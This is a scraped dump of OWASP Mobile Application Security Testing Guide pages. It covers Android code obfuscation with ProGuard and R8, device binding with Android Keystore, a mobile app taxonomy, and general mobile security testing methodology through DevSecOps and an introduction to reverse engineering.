Android apps can implement some of those obfuscation techniques using different tooling. For example, ProGuard offers an easy way to shrink and obfuscate code and to strip unneeded debugging information from the bytecode of Android Java apps. It replaces identifiers, such as class names, method names, and variable names, with meaningless character strings. This is a type of layout obfuscation, which doesn't impact the program's performance.
Decompiling Java classes is trivial, therefore it is recommended to always apply some basic obfuscation to the production bytecode.
Learn more about Android obfuscation techniques:
Developers use the build.gradle file to enable obfuscation. In the example below, you can see that minifyEnabled
and proguardFiles
are set. Creating exceptions to protect some classes from obfuscation (with -keepclassmembers
and -keep class
) is common. Therefore, auditing the ProGuard configuration file to see what classes are exempted is important. The getDefaultProguardFile('proguard-android.txt')
method gets the default ProGuard settings from the <Android SDK>/tools/proguard/
folder.
Further information on how to shrink, obfuscate, and optimize your app can be found in the Android developer documentation.
When you build your project using Android Studio 3.4 or Android Gradle plugin 3.4.0 or higher, the plugin no longer uses ProGuard to perform compile-time code optimization. Instead, the plugin uses the R8 compiler. R8 works with all of your existing ProGuard rules files, so updating the Android Gradle plugin to use R8 should not require you to change your existing rules.
R8 is the new code shrinker from Google and was introduced in Android Studio 3.3 beta. By default, R8 removes attributes that are useful for debugging, including line numbers, source file names, and variable names. R8 is a free Java class file shrinker, optimizer, obfuscator, and pre-verifier and is faster than ProGuard, see also an Android Developer blog post for further details. It is shipped with Android's SDK tools. To activate shrinking for the release build, add the following to build.gradle:
android {\n buildTypes {\n release {\n // Enables code shrinking, obfuscation, and optimization for only\n // your project's release build type.\n minifyEnabled true\n\n // Includes the default ProGuard rules files that are packaged with\n // the Android Gradle plugin. To learn more, go to the section about\n // R8 configuration files.\n proguardFiles getDefaultProguardFile(\n 'proguard-android-optimize.txt'),\n 'proguard-rules.pro'\n }\n }\n ...\n}\n
The file proguard-rules.pro
is where you define custom ProGuard rules. With the flag -keep
you can keep certain code that is not being removed by R8, which might otherwise produce errors. For example to keep common Android classes, as in our sample configuration proguard-rules.pro
file:
...\n-keep public class * extends android.app.Activity\n-keep public class * extends android.app.Application\n-keep public class * extends android.app.Service\n...\n
You can define this more granularly on specific classes or libraries in your project with the following syntax:
-keep public class MyClass\n
Obfuscation often carries a cost in runtime performance, therefore it is usually only applied to certain very specific parts of the code, typically those dealing with security and runtime protection.
"},{"location":"MASTG/Android/0x05j-Testing-Resiliency-Against-Reverse-Engineering/#device-binding","title":"Device Binding","text":"The goal of device binding is to impede an attacker who tries to both copy an app and its state from device A to device B and continue executing the app on device B. After device A has been determined trustworthy, it may have more privileges than device B. These differential privileges should not change when an app is copied from device A to device B.
Before we describe the usable identifiers, let's quickly discuss how they can be used for binding. There are three methods that allow device binding:
Augmenting the credentials used for authentication with device identifiers. This makes sense if the application needs to re-authenticate itself and/or the user frequently.
Encrypting the data stored in the device with the key material which is strongly bound to the device can strengthen the device binding. The Android Keystore offers non-exportable private keys which we can use for this. If a malicious actor were to extract such data from a device, it wouldn't be possible to decrypt the data, as the key is not accessible. Implementing this takes the following steps:
KeyGenParameterSpec
API.//Source: <https://developer.android.com/reference/android/security/keystore/KeyGenParameterSpec.html>\nKeyPairGenerator keyPairGenerator = KeyPairGenerator.getInstance(\n KeyProperties.KEY_ALGORITHM_RSA, \"AndroidKeyStore\");\nkeyPairGenerator.initialize(\n new KeyGenParameterSpec.Builder(\n \"key1\",\n KeyProperties.PURPOSE_DECRYPT)\n .setDigests(KeyProperties.DIGEST_SHA256, KeyProperties.DIGEST_SHA512)\n .setEncryptionPaddings(KeyProperties.ENCRYPTION_PADDING_RSA_OAEP)\n .build());\nKeyPair keyPair = keyPairGenerator.generateKeyPair();\nCipher cipher = Cipher.getInstance(\"RSA/ECB/OAEPWithSHA-256AndMGF1Padding\");\ncipher.init(Cipher.DECRYPT_MODE, keyPair.getPrivate());\n...\n\n// The key pair can also be obtained from the Android Keystore any time as follows:\nKeyStore keyStore = KeyStore.getInstance(\"AndroidKeyStore\");\nkeyStore.load(null);\nPrivateKey privateKey = (PrivateKey) keyStore.getKey(\"key1\", null);\nPublicKey publicKey = keyStore.getCertificate(\"key1\").getPublicKey();\n
//Source: <https://developer.android.com/reference/android/security/keystore/KeyGenParameterSpec.html>\nKeyGenerator keyGenerator = KeyGenerator.getInstance(\n KeyProperties.KEY_ALGORITHM_AES, \"AndroidKeyStore\");\nkeyGenerator.init(\n new KeyGenParameterSpec.Builder(\"key2\",\n KeyProperties.PURPOSE_ENCRYPT | KeyProperties.PURPOSE_DECRYPT)\n .setBlockModes(KeyProperties.BLOCK_MODE_GCM)\n .setEncryptionPaddings(KeyProperties.ENCRYPTION_PADDING_NONE)\n .build());\nSecretKey key = keyGenerator.generateKey();\n\n// The key can also be obtained from the Android Keystore any time as follows:\nKeyStore keyStore = KeyStore.getInstance(\"AndroidKeyStore\");\nkeyStore.load(null);\nkey = (SecretKey) keyStore.getKey(\"key2\", null);\n
Cipher cipher = Cipher.getInstance(\"AES/GCM/NoPadding\");\nfinal byte[] nonce = new byte[GCM_NONCE_LENGTH];\nrandom.nextBytes(nonce);\nGCMParameterSpec spec = new GCMParameterSpec(GCM_TAG_LENGTH * 8, nonce);\ncipher.init(Cipher.ENCRYPT_MODE, key, spec);\nbyte[] aad = \"<deviceidentifierhere>\".getBytes();;\ncipher.updateAAD(aad);\ncipher.init(Cipher.ENCRYPT_MODE, key);\n\n//use the cipher to encrypt the authentication data see 0x50e for more details.\n
Use token-based device authentication (Instance ID) to make sure that the same instance of the app is used.
When we use the term \"mobile application\" or \"mobile app,\" we are referring to a self-contained computer program designed to execute on a mobile device. At the time of publication, the Android and iOS operating systems cumulatively comprise more than 99% of the mobile OS market share and mobile Internet usage has surpassed desktop usage for the first time in history. This means that mobile apps are the most widespread types of Internet-capable apps.
Also, this guide uses the term \"app\" as a general term which refers to any kind of application that runs on a mobile OS. Usually, apps run directly on the platform for which they\u2019re designed, run on top of a smart device\u2019s mobile browser, or they use a mix of these two methods. In this chapter, we will develop a mobile app taxonomy which will fit all apps into categories then discuss the variations of each app category.
We place mobile apps into four categories:
Native Apps Web Apps Hybrid Apps Progressive Web Apps
"},{"location":"MASTG/General/0x04a-Mobile-App-Taxonomy/#native-apps","title":"Native Apps","text":"If a mobile app is developed with a Software Development Kit (SDK) for developing apps specific to a mobile OS, it is referred to as native to that OS. If we are discussing a native app, we presume it was implemented in a standard programming language for that mobile operating system - Objective-C or Swift for iOS, and Java or Kotlin for Android.
Because they are designed for a specific OS with the tools meant for that OS, native apps have the capability to provide the fastest performance with the highest degree of reliability. They usually adhere to platform-specific design principles (e.g. the Android Design Principles), which usually leads to a more consistent user interface (UI) compared to hybrid or web apps. Due to their close integration with the operating system, native apps generally can directly access almost every component of the device (camera, sensors, hardware-backed key stores, etc.).
However, since Android provides two development kits - the Android SDK and the Android NDK, there is some ambiguity to the term native apps for this platform. While the SDK (based on the Java and Kotlin programming language) is the default for developing apps, the platform's NDK (or Native Development Kit) is a C/C++ kit used for developing binary libraries that can directly access lower level APIs (such as OpenGL). These libraries can be included in regular apps built with the SDK. Therefore, we say that Android native apps (i.e. built with the SDK) may have native code built with the NDK.
The most obvious disadvantage of native apps is that they are limited to one specific platform. If developers want to build their app for both Android and iOS, one needs to maintain two independent code bases, or introduce often complex development tools to port a single code base to two platforms.
Here are some multi-platform frameworks that allow developers to compile a single codebase for both Android and iOS:
If an app is developed using these frameworks, the app will use the internal APIs native to each system and offer performance equivalent to native apps. Also, these apps can make use of all device capabilities, including the GPS, accelerometer, camera, the notification system, etc. Since the final output is very similar to previously discussed native apps, apps developed using these frameworks are said to be native apps.
"},{"location":"MASTG/General/0x04a-Mobile-App-Taxonomy/#web-apps","title":"Web Apps","text":"Mobile web apps (or simply, web apps) are websites designed to look and feel like a native app. These apps run on top of a device\u2019s browser and are usually developed in HTML5, much like a modern web page. Launcher icons may be used to parallel the same feel of accessing a native app; however, these icons are essentially the same as a browser bookmark, simply opening the default web browser to load the referenced web page.
Because they run within the confines of a browser, web apps have limited integration with the general components of the device (i.e. they are \"sandboxed\") and their performance is usually inferior compared to native apps. Since developers usually target multiple platforms with a web app, their UIs generally do not follow the design principles of any specific platform. However, web apps are popular because developers can use a single code base to reduce development and maintenance costs and distribute updates without going through the platform-specific app stores. For example, a change to the HTML file for a web app can serve as viable, cross-platform update whereas an update to a store-based app requires considerably more effort.
"},{"location":"MASTG/General/0x04a-Mobile-App-Taxonomy/#hybrid-apps","title":"Hybrid Apps","text":"Hybrid apps try to benefit from the best aspects of native and web apps. This type of app executes like a native app, but a majority of the processes rely on web technologies, meaning a portion of the app runs in an embedded web browser (commonly called \"WebView\"). As such, hybrid apps inherit both pros and cons of native and web apps. These apps can use a web-to-native abstraction layer to access device capabilities that are not accessible to a pure web app. Depending on the framework used for development, a hybrid app code base can generate multiple apps that target different platforms and take advantage of UIs that closely resemble a device's original platform.
Here are some popular frameworks for developing hybrid apps:
Progressive web apps (PWAs) combine different open standards of the web offered by modern browsers to provide benefits of a rich mobile experience. A Web App Manifest, which is a simple JSON file, can be used to configure the behavior of the app after \"installation\". These apps load like regular web pages, but differ from usual web apps in several ways.
For example, it's possible to work offline and to access mobile device hardware, a capability that was previously only available to native apps. PWAs are supported by both Android and iOS, but not all hardware features are yet available. For example, Push Notifications, Face ID on iPhone X, or ARKit for augmented reality are not yet available on iOS.
"},{"location":"MASTG/General/0x04b-Mobile-App-Security-Testing/","title":"Mobile Application Security Testing","text":"In the following sections we'll provide a brief overview of general security testing principles and key terminology. The concepts introduced are largely identical to those found in other types of penetration testing, so if you are an experienced tester you may be familiar with some of the content.
Throughout the guide, we use \"mobile app security testing\" as a catchall phrase to refer to the evaluation of mobile app security via static and dynamic analysis. Terms such as \"mobile app penetration testing\" and \"mobile app security review\" are used somewhat inconsistently in the security industry, but these terms refer to roughly the same thing. A mobile app security test is usually part of a larger security assessment or penetration test that encompasses the client-server architecture and server-side APIs used by the mobile app.
In this guide, we cover mobile app security testing in two contexts. The first is the \"classical\" security test completed near the end of the development life cycle. In this context, the tester accesses a nearly finished or production-ready version of the app, identifies security issues, and writes a (usually devastating) report. The other context is characterized by the implementation of requirements and the automation of security tests from the beginning of the software development life cycle onwards. The same basic requirements and test cases apply to both contexts, but the high-level method and the level of client interaction differ.
"},{"location":"MASTG/General/0x04b-Mobile-App-Security-Testing/#principles-of-testing","title":"Principles of Testing","text":""},{"location":"MASTG/General/0x04b-Mobile-App-Security-Testing/#white-box-testing-versus-black-box-testing","title":"White-box Testing versus Black-box Testing","text":"Let's start by defining the concepts:
We strongly advise that you request the source code so that you can use the testing time as efficiently as possible. The tester's code access obviously doesn't simulate an external attack, but it simplifies the identification of vulnerabilities by allowing the tester to verify every identified anomaly or suspicious behavior at the code level. A white-box test is the way to go if the app hasn't been tested before.
Even though decompiling on Android is straightforward, the source code may be obfuscated, and de-obfuscating will be time-consuming. Time constraints are therefore another reason for the tester to have access to the source code.
"},{"location":"MASTG/General/0x04b-Mobile-App-Security-Testing/#vulnerability-analysis","title":"Vulnerability Analysis","text":"Vulnerability analysis is usually the process of looking for vulnerabilities in an app. Although this may be done manually, automated scanners are usually used to identify the main vulnerabilities. Static and dynamic analysis are types of vulnerability analysis.
"},{"location":"MASTG/General/0x04b-Mobile-App-Security-Testing/#static-versus-dynamic-analysis","title":"Static versus Dynamic Analysis","text":"Static Application Security Testing (SAST) involves examining an app's components without executing them, by analyzing the source code either manually or automatically. OWASP provides information about Static Code Analysis that may help you understand techniques, strengths, weaknesses, and limitations.
Dynamic Application Security Testing (DAST) involves examining the app during runtime. This type of analysis can be manual or automatic. It usually doesn't provide the information that static analysis provides, but it is a good way to detect interesting elements (assets, features, entry points, etc.) from a user's point of view.
Now that we have defined static and dynamic analysis, let's dive deeper.
"},{"location":"MASTG/General/0x04b-Mobile-App-Security-Testing/#static-analysis","title":"Static Analysis","text":"During static analysis, the mobile app's source code is reviewed to ensure appropriate implementation of security controls. In most cases, a hybrid automatic/manual approach is used. Automatic scans catch the low-hanging fruit, and the human tester can explore the code base with specific usage contexts in mind.
"},{"location":"MASTG/General/0x04b-Mobile-App-Security-Testing/#manual-code-review","title":"Manual Code Review","text":"A tester performs manual code review by manually analyzing the mobile app's source code for security vulnerabilities. Methods range from a basic keyword search via the 'grep' command to a line-by-line examination of the source code. IDEs (Integrated Development Environments) often provide basic code review functions and can be extended with various tools.
A common approach to manual code analysis entails identifying key security vulnerability indicators by searching for certain APIs and keywords, such as database-related method calls like \"executeStatement\" or \"executeQuery\". Code containing these strings is a good starting point for manual analysis.
In contrast to automatic code analysis, manual code review is very good for identifying vulnerabilities in the business logic, standards violations, and design flaws, especially when the code is technically secure but logically flawed. Such scenarios are unlikely to be detected by any automatic code analysis tool.
A manual code review requires an expert code reviewer who is proficient in both the language and the frameworks used for the mobile app. Full code review can be a slow, tedious, time-consuming process for the reviewer, especially given large code bases with many dependencies.
"},{"location":"MASTG/General/0x04b-Mobile-App-Security-Testing/#automated-source-code-analysis","title":"Automated Source Code Analysis","text":"Automated analysis tools can be used to speed up the review process of Static Application Security Testing (SAST). They check the source code for compliance with a predefined set of rules or industry best practices, then typically display a list of findings or warnings and flags for all detected violations. Some static analysis tools run against the compiled app only, some must be fed the original source code, and some run as live-analysis plugins in the Integrated Development Environment (IDE).
Although some static code analysis tools incorporate a lot of information about the rules and semantics required to analyze mobile apps, they may produce many false positives, particularly if they are not configured for the target environment. A security professional must therefore always review the results.
The chapter \"Testing Tools\" includes a list of static analysis tools, which can be found at the end of this book.
"},{"location":"MASTG/General/0x04b-Mobile-App-Security-Testing/#dynamic-analysis","title":"Dynamic Analysis","text":"The focus of DAST is the testing and evaluation of apps via their real-time execution. The main objective of dynamic analysis is finding security vulnerabilities or weak spots in a program while it is running. Dynamic analysis is conducted both at the mobile platform layer and against the backend services and APIs, where the mobile app's request and response patterns can be analyzed.
Dynamic analysis is usually used to check for security mechanisms that provide sufficient protection against the most prevalent types of attack, such as disclosure of data in transit, authentication and authorization issues, and server configuration errors.
"},{"location":"MASTG/General/0x04b-Mobile-App-Security-Testing/#avoiding-false-positives","title":"Avoiding False Positives","text":""},{"location":"MASTG/General/0x04b-Mobile-App-Security-Testing/#automated-scanning-tools","title":"Automated Scanning Tools","text":"Automated testing tools' lack of sensitivity to app context is a challenge. These tools may identify a potential issue that's irrelevant. Such results are called \"false positives\".
For example, security testers commonly report vulnerabilities that are exploitable in a web browser but aren't relevant to the mobile app. This false positive occurs because automated tools used to scan the backend service are based on regular browser-based web apps. Issues such as CSRF (Cross-site Request Forgery) and Cross-Site Scripting (XSS) are reported accordingly.
Let's take CSRF as an example. A successful CSRF attack requires the following:
Mobile apps don't fulfill these requirements: even if WebViews and cookie-based session management are used, any malicious link the user clicks opens in the default browser, which has a separate cookie store.
Stored Cross-Site Scripting (XSS) can be an issue if the app includes WebViews, and it may even lead to command execution if the app exports JavaScript interfaces. However, reflected Cross-Site Scripting is rarely an issue for the reason mentioned above (even though whether they should exist at all is arguable, escaping output is simply a best practice).
In any case, consider exploit scenarios when you perform the risk assessment; don't blindly trust your scanning tool's output.
"},{"location":"MASTG/General/0x04b-Mobile-App-Security-Testing/#penetration-testing-aka-pentesting","title":"Penetration Testing (a.k.a. Pentesting)","text":"The classic approach involves all-around security testing of the app's final or near-final build, e.g., the build that's available at the end of the development process. For testing at the end of the development process, we recommend the Mobile App Security Verification Standard (MASVS) and the associated checklist as baseline for testing. A typical security test is structured as follows:
The security level at which the app will be tested must be decided before testing. The security requirements should be decided at the beginning of the project. Different organizations have different security needs and resources available for investing in test activities. Although the controls in MASVS Level 1 (L1) are applicable to all mobile apps, walking through the entire checklist of L1 and Level 2 (L2) MASVS controls with technical and business stakeholders is a good way to decide on a level of test coverage.
Organizations may have different regulatory and legal obligations in certain territories. Even if an app doesn't handle sensitive data, some L2 requirements may be relevant (because of industry regulations or local laws). For example, two-factor authentication (2FA) may be obligatory for a financial app and enforced by a country's central bank and/or financial regulatory authorities.
Security goals/controls defined earlier in the development process may also be reviewed during the discussion with stakeholders. Some controls may conform to MASVS controls, but others may be specific to the organization or app.
All involved parties must agree on the decisions and the scope in the checklist because these will define the baseline for all security testing.
"},{"location":"MASTG/General/0x04b-Mobile-App-Security-Testing/#coordinating-with-the-client","title":"Coordinating with the Client","text":"Setting up a working test environment can be a challenging task. For example, restrictions on the enterprise wireless access points and networks may impede dynamic analysis performed at client premises. Company policies may prohibit the use of rooted phones or (hardware and software) network testing tools within enterprise networks. Apps that implement root detection and other reverse engineering countermeasures may significantly increase the work required for further analysis.
Security testing involves many invasive tasks, including monitoring and manipulating the mobile app's network traffic, inspecting the app data files, and instrumenting API calls. Security controls, such as certificate pinning and root detection, may impede these tasks and dramatically slow testing down.
To overcome these obstacles, you may want to request two of the app's build variants from the development team. One variant should be a release build so that you can determine whether the implemented controls are working properly and can't be bypassed easily. The second variant should be a debug build for which certain security controls have been deactivated. Testing two different builds is the most efficient way to cover all test cases.
Depending on the scope of the engagement, this approach may not be possible. Requesting both production and debug builds for a white-box test will help you complete all test cases and clearly state the app's security maturity. The client may prefer that black-box tests be focused on the production app and the evaluation of its security controls' effectiveness.
The scope of both types of testing should be discussed during the preparation phase. For example, whether the security controls should be adjusted should be decided before testing. Additional topics are discussed below.
"},{"location":"MASTG/General/0x04b-Mobile-App-Security-Testing/#identifying-sensitive-data","title":"Identifying Sensitive Data","text":"Classifications of sensitive information differ by industry and country. In addition, organizations may take a restrictive view of sensitive data, and they may have a data classification policy that clearly defines sensitive information.
There are three general states from which data may be accessible:
The degree of scrutiny that's appropriate for each state may depend on the data's importance and likelihood of being accessed. For example, data held in app memory may be more vulnerable than data on web servers to access via core dumps because attackers are more likely to gain physical access to mobile devices than to web servers.
When no data classification policy is available, use the following list of information that's generally considered sensitive:
A definition of \"sensitive data\" must be decided before testing begins because detecting sensitive data leakage without a definition may be impossible.
"},{"location":"MASTG/General/0x04b-Mobile-App-Security-Testing/#intelligence-gathering","title":"Intelligence Gathering","text":"Intelligence gathering involves the collection of information about the app's architecture, the business use cases the app serves, and the context in which the app operates. Such information may be classified as \"environmental\" or \"architectural\".
"},{"location":"MASTG/General/0x04b-Mobile-App-Security-Testing/#environmental-information","title":"Environmental Information","text":"Environmental information includes:
Architectural information includes:
Once the security tester has information about the app and its context, the next step is mapping the app's structure and content, e.g., identifying its entry points, features, and data.
When penetration testing is performed in a white-box or grey-box paradigm, any documents from the interior of the project (architecture diagrams, functional specifications, code, etc.) may greatly facilitate the process. If source code is available, the use of SAST tools can reveal valuable information about vulnerabilities (e.g., SQL Injection). DAST tools may support black-box testing and automatically scan the app: whereas a tester will need hours or days, a scanner may perform the same task in a few minutes. However, it's important to remember that automatic tools have limitations and will only find what they have been programmed to find. Therefore, human analysis may be necessary to augment results from automatic tools (intuition is often key to security testing).
Threat Modeling is an important artifact: documents from the workshop usually greatly support the identification of much of the information a security tester needs (entry points, assets, vulnerabilities, severity, etc.). Testers are strongly advised to discuss the availability of such documents with the client. Threat modeling should be a key part of the software development life cycle. It usually occurs in the early phases of a project.
The threat modeling guidelines defined in OWASP are generally applicable to mobile apps.
"},{"location":"MASTG/General/0x04b-Mobile-App-Security-Testing/#exploitation","title":"Exploitation","text":"Unfortunately, time or financial constraints limit many pentests to application mapping via automated scanners (for vulnerability analysis, for example). Although vulnerabilities identified during the previous phase may be interesting, their relevance must be confirmed with respect to five axes:
Against all odds, some vulnerabilities may not be exploitable and may lead to minor compromises, if any. Other vulnerabilities may seem harmless at first sight, yet be determined very dangerous under realistic test conditions. Testers who carefully go through the exploitation phase support pentesting by characterizing vulnerabilities and their effects.
"},{"location":"MASTG/General/0x04b-Mobile-App-Security-Testing/#reporting","title":"Reporting","text":"The security tester's findings will be valuable to the client only if they are clearly documented. A good pentest report should include information such as, but not limited to, the following:
Many pentest report templates are available on the Internet: Google is your friend!
"},{"location":"MASTG/General/0x04b-Mobile-App-Security-Testing/#security-testing-and-the-sdlc","title":"Security Testing and the SDLC","text":"Although the principles of security testing haven't fundamentally changed in recent history, software development techniques have changed dramatically. While the widespread adoption of Agile practices was speeding up software development, security testers had to become quicker and more agile while continuing to deliver trustworthy software.
The following section is focused on this evolution and describes contemporary security testing.
"},{"location":"MASTG/General/0x04b-Mobile-App-Security-Testing/#security-testing-during-the-software-development-life-cycle","title":"Security Testing during the Software Development Life Cycle","text":"Software development is not very old, after all, so the end of developing without a framework is easy to observe. We have all experienced the need for a minimal set of rules to control work as the source code grows.
In the past, \"Waterfall\" methodologies were the most widely adopted: development proceeded by steps that had a predefined sequence. Limited to a single step, backtracking capability was a serious drawback of Waterfall methodologies. Although they have important positive features (providing structure, helping testers clarify where effort is needed, being clear and easy to understand, etc.), they also have negative ones (creating silos, being slow, specialized teams, etc.).
As software development matured, competition increased and developers needed to react to market changes more quickly while creating software products with smaller budgets. The idea of less structure became popular, and smaller teams collaborated, breaking silos throughout the organization. The \"Agile\" concept was born (Scrum, XP, and RAD are well-known examples of Agile implementations); it enabled more autonomous teams to work together more quickly.
Security wasn't originally an integral part of software development. It was an afterthought, performed at the network level by operation teams who had to compensate for poor software security! Although unintegrated security was possible when software programs were located inside a perimeter, the concept became obsolete as new kinds of software consumption emerged with web, mobile, and IoT technologies. Nowadays, security must be baked inside software because compensating for vulnerabilities is often very difficult.
\"SDLC\" will be used interchangeably with \"Secure SDLC\" in the following section to help you internalize the idea that security is a part of software development processes. In the same spirit, we use the name DevSecOps to emphasize the fact that security is part of DevOps.
"},{"location":"MASTG/General/0x04b-Mobile-App-Security-Testing/#sdlc-overview","title":"SDLC Overview","text":""},{"location":"MASTG/General/0x04b-Mobile-App-Security-Testing/#general-description-of-sdlc","title":"General Description of SDLC","text":"SDLCs always consist of the same steps (the overall process is sequential in the Waterfall paradigm and iterative in the Agile paradigm):
The picture below illustrates all the phases and artifacts:
Based on the project's general risk profile, you may simplify (or even skip) some artifacts, and you may add others (formal intermediary approvals, formal documentation of certain points, etc.). Always remember two things: an SDLC is meant to reduce risks associated with software development, and it is a framework that helps you set up controls to that end. This is a generic description of SDLC; always tailor this framework to your projects.
"},{"location":"MASTG/General/0x04b-Mobile-App-Security-Testing/#defining-a-test-strategy","title":"Defining a Test Strategy","text":"Test strategies specify the tests that will be performed during the SDLC as well as testing frequency. Test strategies are used to make sure that the final software product meets security objectives, which are generally determined by clients' legal/marketing/corporate teams. The test strategy is usually created during the Secure Design phase, after risks have been clarified (during the Initiation phase) and before code development (the Secure Implementation phase) begins. The strategy requires input from activities such as Risk Management, previous Threat Modeling, and Security Engineering.
A Test Strategy needn't be formally written: it may be described through Stories (in Agile projects), quickly enumerated in checklists, or specified as test cases for a given tool. However, the strategy must definitely be shared because it must be implemented by a team other than the team who defined it. Moreover, all technical teams must agree to it to ensure that it doesn't place unacceptable burdens on any of them.
Test Strategies address topics such as the following:
To track the testing strategy's progress and effectiveness, metrics should be defined, continually updated during the project, and periodically communicated. An entire book could be written about choosing relevant metrics; the most we can say here is that they depend on risk profiles, projects, and organizations. Examples of metrics include the following:
These are only suggestions; other metrics may be more relevant to your project. Metrics are powerful tools for getting a project under control, provided they give project managers a clear and synthetic perspective on what is happening and what needs to be improved.
Distinguishing between tests performed by an internal team and tests performed by an independent third party is important. Internal tests are usually useful for improving daily operations, while third-party tests are more beneficial to the whole organization. Internal tests can be performed quite often, but third-party testing happens at most once or twice a year; also, the former are less expensive than the latter. Both are necessary, and many regulations mandate tests from an independent third party because such tests can be more trustworthy.
"},{"location":"MASTG/General/0x04b-Mobile-App-Security-Testing/#security-testing-in-waterfall","title":"Security Testing in Waterfall","text":""},{"location":"MASTG/General/0x04b-Mobile-App-Security-Testing/#what-waterfall-is-and-how-testing-activities-are-arranged","title":"What Waterfall Is and How Testing Activities Are Arranged","text":"Basically, SDLC doesn't mandate the use of any development life cycle: it is safe to say that security can (and must!) be addressed in any situation.
Waterfall methodologies were popular before the 21st century. The most famous application is called the \"V model\", in which phases are performed in sequence and you can backtrack only a single step. The testing activities of this model occur in sequence and are performed as a whole, mostly at the point in the life cycle when most of the app development is complete. This activity sequence means that changing the architecture and other factors that were set up at the beginning of the project is hardly possible even though code may be changed after defects have been identified.
"},{"location":"MASTG/General/0x04b-Mobile-App-Security-Testing/#security-testing-for-agiledevops-and-devsecops","title":"Security Testing for Agile/DevOps and DevSecOps","text":"DevOps refers to practices that focus on a close collaboration between all stakeholders involved in software development (generally called Devs) and operations (generally called Ops). DevOps is not about merging Devs and Ops. Development and operations teams originally worked in silos, when pushing developed software to production could take a significant amount of time. When development teams made moving more deliveries to production necessary by working with Agile, operation teams had to speed up to match the pace. DevOps is the necessary evolution of the solution to that challenge in that it allows software to be released to users more quickly. This is largely accomplished via extensive build automation, the process of testing and releasing software, and infrastructure changes (in addition to the collaboration aspect of DevOps). This automation is embodied in the deployment pipeline with the concepts of Continuous Integration and Continuous Delivery (CI/CD).
People may assume that the term \"DevOps\" represents collaboration between development and operations teams only, however, as DevOps thought leader Gene Kim puts it: \"At first blush, it seems as though the problems are just between Devs and Ops, but test is in there, and you have information security objectives, and the need to protect systems and data. These are top-level concerns of management, and they have become part of the DevOps picture.\"
In other words, DevOps collaboration includes quality teams, security teams, and many other teams related to the project. When you hear \"DevOps\" today, you should probably be thinking of something like DevOpsQATestInfoSec. Indeed, DevOps values pertain to increasing not only speed but also quality, security, reliability, stability, and resilience.
Security is just as critical to business success as the overall quality, performance, and usability of an app. As development cycles are shortened and delivery frequencies increased, making sure that quality and security are built in from the very beginning becomes essential. DevSecOps is all about adding security to DevOps processes. Most defects are identified during production. DevOps specifies best practices for identifying as many defects as possible early in the life cycle and for minimizing the number of defects in the released app.
However, DevSecOps is not just a linear process oriented towards delivering the best possible software to operations; it is also a mandate that operations closely monitor software that's in production to identify issues and fix them by forming a quick and efficient feedback loop with development. DevSecOps is a process through which Continuous Improvement is heavily emphasized.
The human aspect of this emphasis is reflected in the creation of cross-functional teams that work together to achieve business outcomes. This section is focused on necessary interactions and integrating security into the development life cycle (which starts with project inception and ends with the delivery of value to users).
"},{"location":"MASTG/General/0x04b-Mobile-App-Security-Testing/#what-agile-and-devsecops-are-and-how-testing-activities-are-arranged","title":"What Agile and DevSecOps Are and How Testing Activities Are Arranged","text":""},{"location":"MASTG/General/0x04b-Mobile-App-Security-Testing/#overview","title":"Overview","text":"Automation is a key DevSecOps practice: as stated earlier, the frequency of deliveries from development to operation increases when compared to the traditional approach, and activities that usually require time need to keep up, e.g. deliver the same added value while taking less time. Unproductive activities must consequently be abandoned, and essential tasks must be fastened. These changes impact infrastructure changes, deployment, and security:
The following sections provide more details about these three points.
"},{"location":"MASTG/General/0x04b-Mobile-App-Security-Testing/#infrastructure-as-code","title":"Infrastructure as Code","text":"Instead of manually provisioning computing resources (physical servers, virtual machines, etc.) and modifying configuration files, Infrastructure as Code is based on the use of tools and automation to fasten the provisioning process and make it more reliable and repeatable. Corresponding scripts are often stored under version control to facilitate sharing and issue resolution.
Infrastructure as Code practices facilitate collaboration between development and operations teams, with the following results:
Infrastructure as Code also facilitates the construction of the environments required by classical software creation projects, for development (\"DEV\"), integration (\"INT\"), testing (\"PPR\" for Pre-Production. Some tests are usually performed in earlier environments, and PPR tests mostly pertain to non-regression and performance with data that's similar to data used in production), and production (\"PRD\"). The value of infrastructure as code lies in the possible similarity between environments (they should be the same).
Infrastructure as Code is commonly used for projects that have Cloud-based resources because many vendors provide APIs that can be used for provisioning items (such as virtual machines, storage spaces, etc.) and working on configurations (e.g., modifying memory sizes or the number of CPUs used by virtual machines). These APIs provide alternatives to administrators' performing these activities from monitoring consoles.
The main tools in this domain are Puppet, Terraform, Packer, Chef and Ansible.
"},{"location":"MASTG/General/0x04b-Mobile-App-Security-Testing/#deployment","title":"Deployment","text":"The deployment pipeline's sophistication depends on the maturity of the project organization or development team. In its simplest form, the deployment pipeline consists of a commit phase. The commit phase usually involves running simple compiler checks and the unit test suite as well as creating a deployable artifact of the app. A release candidate is the latest version that has been checked into the trunk of the version control system. Release candidates are evaluated by the deployment pipeline for conformity to standards they must fulfill for deployment to production.
The commit phase is designed to provide instant feedback to developers and is therefore run on every commit to the trunk. Time constraints exist because of this frequency. The commit phase should usually be complete within five minutes, and it shouldn't take longer than ten. Adhering to this time constraint is quite challenging when it comes to security because many security tools can't be run quickly enough (#paul, #mcgraw).
CI/CD means \"Continuous Integration/Continuous Delivery\" in some contexts and \"Continuous Integration/Continuous Deployment\" in others. Actually, the logic is:
The delivery and deployment of apps with low or medium sensitivity may be merged into a single step, and validation may be performed after delivery. However, keeping these two actions separate and using strong validation are strongly advised for sensitive apps.
"},{"location":"MASTG/General/0x04b-Mobile-App-Security-Testing/#security","title":"Security","text":"At this point, the big question is: now that other activities required for delivering code are completed significantly faster and more effectively, how can security keep up? How can we maintain an appropriate level of security? Delivering value to users more often with decreased security would definitely not be good!
Once again, the answer is automation and tooling: by implementing these two concepts throughout the project life cycle, you can maintain and improve security. The higher the expected level of security, the more controls, checkpoints, and emphasis will take place. The following are examples:
The security of an app developed with DevOps must be considered during operations. The following are examples:
Reverse engineering and tampering techniques have long belonged to the realm of crackers, modders, malware analysts, etc. For \"traditional\" security testers and researchers, reverse engineering has been more of a complementary skill. But the tides are turning: mobile app black-box testing increasingly requires disassembling compiled apps, applying patches, and tampering with binary code or even live processes. The fact that many mobile apps implement defenses against unwelcome tampering doesn't make things easier for security testers.
Reverse engineering a mobile app is the process of analyzing the compiled app to extract information about its source code. The goal of reverse engineering is comprehending the code.
Tampering is the process of changing a mobile app (either the compiled app or the running process) or its environment to affect its behavior. For example, an app might refuse to run on your rooted test device, making it impossible to run some of your tests. In such cases, you'll want to alter the app's behavior.
Mobile security testers are served well by understanding basic reverse engineering concepts. They should also know mobile devices and operating systems inside out: processor architecture, executable format, programming language intricacies, and so forth.
